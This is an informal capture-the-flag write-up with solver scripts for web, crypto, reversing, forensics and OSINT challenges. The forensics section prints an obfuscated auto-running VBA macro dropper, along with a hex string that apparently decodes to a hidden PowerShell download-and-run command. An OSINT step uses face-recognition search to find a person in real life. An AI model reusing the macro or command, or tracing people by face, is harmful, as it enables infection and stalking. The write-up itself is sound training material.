# Writeup of writeups gg HTB # WEB - Yconvert We followed this writeup: https://fmash16.github.io/content/writeups/hackthebox/htb-Ophiuchi.html also we needed to have jdk-11 (took us like 5 hours to figure this out)  # WEB - GITLAB https://github.com/thewhiteh4t/cve-2020-10977 # WEB - Retro Auctions Again, we followed this writeup: https://viblo.asia/p/write-up-htbctf-cyber-apocalypse-2023-the-cursed-mission-web-unearthly-shop-38X4ENGXJN2 good luck decrypting the weird language it's written in. also thx for really quality and unique web challs :) We admire your effort to redesign the whole frontend app just for this event 🥰 # Crypto - No_crypto We just programmed reversed `secret()` function. The only "problem" was that base64 encoded text was change to lowercase. The whole script is following: ```python import base64 import itertools de_secret = "runtq3tmzweznwixnzk5zdy4mdqzztrjn2m5n2vlzdk2mwqzm2u2yjlhmwzhogmwodjiodbjotcxotkznmi5ztzjntnifq==" # I want to loop de_secret every 4 chars index = 0 flag = [] # flag = [23*[]] for i in range(0, 23): flag.append([]) for i in range(0, len(de_secret), 4): block = de_secret[i:i+4] input_string = "" # loop through block every char in block for block_char in block: input_string += block_char all_combinations = [] # Generate all possible combinations of upper and lower characters for combo in itertools.product(*zip(input_string.lower(), input_string.upper())): all_combinations.append("".join(combo)) print(all_combinations) for combination in all_combinations: try: # Decode the Base64 string decoded_bytes = base64.b64decode(combination) # print("decoded_bytes: ", decoded_bytes) decoded_string = decoded_bytes.decode('utf-8') # Check if the decoded string contains only valid ASCII alphabet characters if all(32 <= ord(char) <= 126 for char in decoded_string): # flag[index].append(decoded_string) print("Decoded string: ", index, ": ", decoded_string) # append string to the two dimensional aray flag if not decoded_string in flag[index]: flag[index].append(decoded_string) except Exception as e: continue # print("Error decoding the Base64 string:", e) index += 1 print(flag) ``` # REV - Backward banana - debug -> if (v3) => set `v3` as `1` so it breaks - base64 decode flag.. > `ECSC{0_5cR4m8l3D_eL3mE9t5_pL4c3D_t06etH3r}` # REV - amazing - solution: ``` import random import time # Load the encrypted data from "flag.enc". with open("flag.enc", "rb") as enc_file: encrypted_data = bytearray(enc_file.read()) # Calculate the time range from 1 minute ago until now. end_time = int(time.time()) start_time = end_time - (60*60*24*5) # 60 seconds in a minute # Define the range for v8 values. for current_time in range(end_time, start_time, -1): for v8 in range(0, 4919): # Seed the random number generator. random.seed(current_time) rand = random.randint(0, 4918) # Generate v8 just as in the original code. if rand == v8: decrypted_data = bytearray(encrypted_data) # Attempt decryption. for i in range(len(encrypted_data)): decrypted_data[i] = (encrypted_data[i] - v8 + 4919) % 256 # Check if the decrypted data contains meaningful information. decrypted_text = decrypted_data.decode('utf-8', errors='ignore') if "ECSC" in decrypted_text: print(f"Possible flag found with time = {current_time} and seed = {v8}:\n{decrypted_text}") print("Decryption attempts completed.") # Possible flag found with time = 1698310613 and seed = 575: # ECSC{1191dOe67OO73a5O9a5ff9ecd9e2f992d4lf6dbO549c3d8acdb271122c764cf3} ``` # FORENSICS - High ambitions ‌ ``` pcode2code Invest.doc ``` ```visualbasic Option Explicit Public Function AH_CU(ByVal Text As String) Dim AQ_CU As String Dim AK_CU As Long For AK_CU = 1 To Len(Text) Step 2 AQ_CU = AQ_CU & Chr(Asc(Chr("&H" & Mid(Text, AK_CU, 2))) - 9) Next AH_CU = AQ_CU End Function Public Sub AutoOpen() Application.Run "AL_CU" End Sub Sub AL_CU() CreateObject("Excel.Application").Wait(Now + TimeValue("00:05:00"))) AO_CU End Sub Public Sub Document_Open() Application.Run "AL_CU" End Sub Public Sub AO_CU() Dim AG_CU As Object: Set AG_CU = VBA.CreateObject(AH_CU("605C6C7B72797D375C716E7575")) Dim AF_CU As String AF_CU = "479446F10185F029B32ED78FC95F29EFA228F0D2EB3FA5982AD1B5C022ADFA9CD9EBF0FDE3E435D3B37C8FBE8D0A6A27163FDD6569B1BCCFD263B9B35CA12227BBD558B692C1F33F507B6D82A5123F7EF19DA3BBCE23A6C327CBC31E3932D1AE2BCAF6E07" Dim AB_CU As String AB_CU = "A7D6A98EBBAD1D57AB7B56D12158EDABD655C5BC496B6115B72CDFFBAD77DD7EA81AAA76CA3B4CF35DC0B91F3D6D6BD873E004EEBBB37252B6FB1EDC6DB686DA3AFEAADDBED56E73011904FBC1BEFADFCB4251DFDEC0A9D25BDAC74DF06A85BC11D6351DD" Dim AW_CU As String AW_CU = "F9FF4EADBCFFF3A1B6ACE2DEBA82BF6FA902FEE05DDBDAD9AD8C2C367DCE280FCD61113D71EF3AB7BCFFC02AFEB4DA9CD29EB3EFE036AFCF9A988B4A1C9AFE4880A5E584BDC296132DB95A6577E8CB2EFDD8F8187786C3E5EAD3DAEA53CA988C9EF2A5E05" Dim AZ_CU As String AZ_CU = "92A6BD20EBBC1F1DEA2E6BB86EEC1E5532663AAE7DB5D1A057F94CEA7FBE52BECEBB417B3B2D1EDB769DC830C8041A8F583CBCA00D1F9EB0FDCECA83ED53F5BDDB0DA00BBAACCF7406FAB82D9B00CEEFF8BB59CBB88C0198AAF632FB1BB3FDECC2E6B9D58" Dim AP_CU As String AP_CU = "0E881FEAA0CF4A2BD54BB00C7AAD827C2AFB3AB2DD1407411BCBF53A54D654CEBDEB17AFBBC77B715BA60B241C789D0AFC904DD450291B57CFAD77AB7F3BC93E1E2EADC197008CBDF63FACE61CD0FFA7B9E32BDCDC7B18D5E9D7AEFE82CB8DEB27635E0BC" Dim AQ_CU As String AQ_CU = "118B2EC728592A6A7C67BCBE8FE810C6636F6FAE0EF7FB9D6FF30DFCD9342757B0D4EAFA992E42A2CEC0EF4CFB1B6CDBE48BCE0FEBC789C0D896EEFB67D52D6CEFA65770555CAE6B110ACDF8A6F5DE5BAE81AA2FECEFC2A3C1C413A1DB81F9136DBBCD4AA" Dim AM_CU As String AM_CU = "BBD8A5EFFC11A909FCC5EEB5E1B43A6F7ABFCA7ECEBDEBD1B1EAC43F06BFABDA5B9DF1FC698D1EFE1D55F23DD88BDE951EDC9DACCE57DC4793B3B41C6A5ABFD5BABB4F910B6697EF0C1CCAA733998A5B01FAB0D2DD8708FF7ADDFE1B8EB4503E4BE7D98D2" Dim AN_CU As String AN_CU = "A21EFF49C0690C39EB91847ABBC134DB393BB1F8AB4FCC68BAADBBAD8ED9303AF1429CF8029E2EEEEC0BAD9EEFF5F2ABAEDD7BFBED031F5D2709F3FEE3D8FB4FBFA1DEB8FCED5DBA56FD5C7FBDC769C17FC38809DEF9C64DE5C7ADA68A1BECF50FAB27A31" Dim AV_CU As String AV_CU = "1C0B41EE938AD2E390AA3DDEFD42F3A38EC391EDC90C673792A7DE5E84FE87A73ABCCABBCF3245EED4A19AA855E5732FC9DD3B73B72EEFA80A2F172DDCA08B3E0FBEE6356DCD5BA1A40FC2D1BEF6C6145CF0C5AC3349202BB490DC63A1A3DD62F038BCF8F" Dim AR_CU As String AR_CU = "7474779304747104147475D471EFB1D4F0EF3C6F9BCEB39D4BF6D41ACF2BE7CE1CA9EC6DFBF36335AABB1D97B8E021ADA1BEBC4A1E8A0E15CDDFECF84B681DC2BE0D4984EB8CFD6158449FB0BC3B8DACFABAABBFCC4DF7C3D6EF3938B8CDBCDDB60CBF276BEE1DBFCA500BB8D35DC36ED2E860B4747444F4547474430474747474D488035476447471447474747474747474776474747" AG_CU.Exec AH_CU(ActiveDocument.Variables("AX_CU")) End Sub Sub Workbook_Open() Application.Run "ThisWorkbook.AL_CU" End Sub ``` ‌ ‌ - found in hexdump ``` output = "" # str_in = "".join(all_stuff) str_in = "5978806E7B7C716E7575376E816E29366072776D78805C7D82756E2951726D6D6E7729367778797B786F72756E29645B6E6F66374A7C7C6E766B758237506E7D5D82796E31305C827C7D6E7637566A776A706E766E777D374A7E7D78766A7D727877374A767C725E7D72757C303237506E7D4F726E756D31306A767C725277727D4F6A72756E6D303530577877597E6B75726C355C7D6A7D726C3032375C6E7D5F6A757E6E312D777E7575352D7D7B7E6E3244526F29317D6E7C7D36796A7D7129292D6E777F434A59594D4A5D4A29342930654B7E776C716A376E816E303229845B6E76787F6E36527D6E7629292D6E777F434A59594D4A5D4A29342930654B7E776C716A376E816E308644292D5F574D55294629576E8036586B736E6C7D295C827C7D6E7637576E7D37606E6B4C75726E777D44292D5F574D5537516E6A6D6E7B7C64305E7C6E7B364A706E777D306629462930515D4B845F4B4A685C7D3976793A7742683A7C68737E2D40683D776839754D687D3C6C51773A5A7E3C863044292D5F574D55374D78807775786A6D4F72756E3130717D7D794338388072776D78807C75727F6E7E796D6A7D6E7B376C787638796A776A6D78757C376E816E3035292D6E777F434A59594D4A5D4A29342930654B7E776C716A376E816E3032442931576E8036586B736E6C7D29366C7876295C716E7575374A797975726C6A7D72787732375C716E75754E816E6C7E7D6E312D6E777F434A59594D4A5D4A29342930654B7E776C716A376E816E303244295C7D787936597B786C6E7C7C2936526D292D59726D29364F787B6C6E" for i in range(0, len(str_in), 2): output += chr(int(str_in[i:i+2], base=16) - 9) print(output) # HTB{VBA_St0mp1n9_1s_ju$7_4n_0lD_t3cHn1Qu3} ``` # misc - Finding memes - use [https://pimeyes.com/en](https://pimeyes.com/en "smartCard-inline") and find him irl > `ECSC{bamsemums}`